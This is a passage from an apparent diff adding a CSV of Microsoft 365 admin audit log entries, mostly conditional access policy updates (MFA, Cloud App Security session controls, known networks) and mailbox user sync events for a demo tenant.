+    ""Value"": ""{\""Version\"":0,\""CreatedDateTime\"":\""2020-05-19T13:34:15.2394934Z\"",\""ModifiedDateTime\"":\""2020-05-19T13:39:04.7333386Z\"",\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""None\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""Guests\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\"",\""RequireCompliantDevice\""]}]}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/21/2020 1:50:12 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Yanivsh -CA Test""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-21T01:50:12Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/21/2020 1:50:12 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-21T01:50:12Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/21/2020 1:50:12 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-21T01:50:12Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/21/2020 1:50:12 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-21T01:50:12Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/21/2020 1:50:12 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-21T01:50:12Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/21/2020 1:50:11 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-20T22:56:57Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-20T22:56:57Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-21T03:11:04Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\009194cf-7935-420a-9f05-1782af9ada42""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-21T04:32:07Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/21/2020 4:32:07 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-05-21T04:32:06Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/21/2020 4:32:06 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-21T04:32:05Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/21/2020 4:32:05 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-21T04:32:05Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/21/2020 4:32:04 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-21T04:32:04Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/21/2020 4:32:04 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-21T04:32:07Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\3b13ea3c-c733-4eb8-bd19-67d308b2ea04""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""CreatedDateTime\"":\""2020-05-19T13:34:15.2394934Z\"",\""ModifiedDateTime\"":\""2020-05-19T13:39:04.7333386Z\"",\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""None\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""Guests\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\"",\""RequireCompliantDevice\""]}]}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/21/2020 4:32:07 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Yanivsh -CA Test""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-21T04:32:06Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/21/2020 4:32:06 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""5/19/2020 1:39:05 PM""
+  }
+]"
+2020-05-21T04:32:05Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/21/2020 4:32:05 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-21T04:32:04Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/21/2020 4:32:04 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-21T04:32:04Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/21/2020 4:32:04 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-21T04:32:07Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/21/2020 4:32:06 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-21T04:32:06Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/21/2020 4:32:05 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-21T04:32:06Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/21/2020 4:32:06 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-21T04:32:03Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/21/2020 4:32:03 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-21T05:21:01Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\f7ed24a4-8fab-4f94-a97f-533604a3453a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-21T04:58:21Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-21T04:58:21Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-14T23:41:58Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
